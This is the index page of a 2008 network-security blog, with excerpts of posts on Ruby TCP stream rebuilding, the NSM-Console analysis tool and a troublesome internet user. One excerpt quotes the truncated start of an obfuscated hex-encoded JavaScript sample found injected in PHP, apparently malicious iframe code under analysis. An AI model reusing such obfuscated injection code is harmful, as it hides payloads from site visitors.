• The Strange Case of Yousif Yalda, an addendum

    March 28, 2008

    For people who follow the McGrewSecurity.com blog by Wesley McGrew, you are no doubt familiar with an “internet user” by the name of Yousif Yalda. For a little background, take a read on Wesley’s post on some of the “business tactics” of Yousif. Seeing as how this is the internet, and we’re all entitled to […]

    posted in kiddie, log, script, skiddie, threats, yousif by Lee

  • Rebuilding TCP streams with Ruby part 2: fuzzysort

    March 19, 2008

    This is part 2 of a series on rebuilding TCP streams using Ruby, for more information, visit the previous post: Rebuilding TCP streams with Ruby part 1: fuzzymatch In my previous post, I talked about using fuzzy sequence/acknowledge numbers to split a network capture file into streams. Using fuzzymatch was pretty successful for cutting streams […]

    posted in fuzzymatch, internet, rebuild, ruby, script, sequence, stream, tcp by Lee

  • NSM-Console version 0.6 release

    March 14, 2008

    I’m happy to announce the release of the next version of NSM-Console. Version 0.6. If you are unfamiliar with NSM-Console, here’s the synopsis from the project page: NSM-Console (Network Security Monitoring Console) is a framework for performing analysis on packet capture files. It implements a modular structure to allow for an analyst to quickly write […]

    posted in bro-ids, clamscan, dump, foremost, gzip, harimau, monitoring, network, nsm, nsm console, packet, pcap, security, snort, trace-summary, whitepaper by Lee

  • Rebuilding TCP streams with Ruby part 1: fuzzymatch

    March 11, 2008

    I have undertaken the (not so small) task of attempting to use Ruby to rebuild TCP data streams. I was originally planning on using ruby-libnids, but after running into considerable trouble with dynamic library linking on OSX, I decided it’d be a good experiment to write my own. This is not a small feat. In […]

    posted in fuzzymatch, internet, rebuild, ruby, script, sequence, stream, tcp by Lee

  • First published paper on NSM-Console

    March 9, 2008

    I’m written a whitepaper on some of the ideas behind NSM-Console, it also explains some of the basics of usage and what it is originally designed for, you can download the whitepaper directly or get it from the papers section on my site. Excerpt from the abstract: “With the proliferation of dozens of different packet […]

    posted in monitoring, network, nsm, nsm console, paper, pdf, publish, security by Lee

  • Obfuscated javascript fun

    March 5, 2008

    A friend of mine (thanks Legit) turned me on to this piece of javascript found in the midst of some PHP: <script language=”JavaScript”> var0 = “x69x3cx33x27x34x38x30x75x3bx34″; var1 = “x38x30x68x72x36x3ax20x3bx21x30″; var2 = “x27x72x75x26x27x36x68x72x3dx21″; var3 = “x21x25x6fx7ax7ax33x27x34x38x30″; var4 = “x26x21x34x21x7bx3bx30x21x7ax3c”; var5 = “x3bx31x30x2dx67x7bx25x3dx25x72″; var6 = “x75x3dx30x3cx32x3dx21x68x72x64″; var7 = “x63x72x75x22x3cx31x21x3dx68x72″; var8 = “x64x63x72x75x33x27x34x38x30x37″; var9 = “x3ax27x31x30x27x68x72x65x72x75″; var10 = […]

    posted in iframe, javascript, obfuscation, php, ruby, script by Lee

 
Powered by Wordpress and MySQL. Theme by Shlomi Noach, openark.org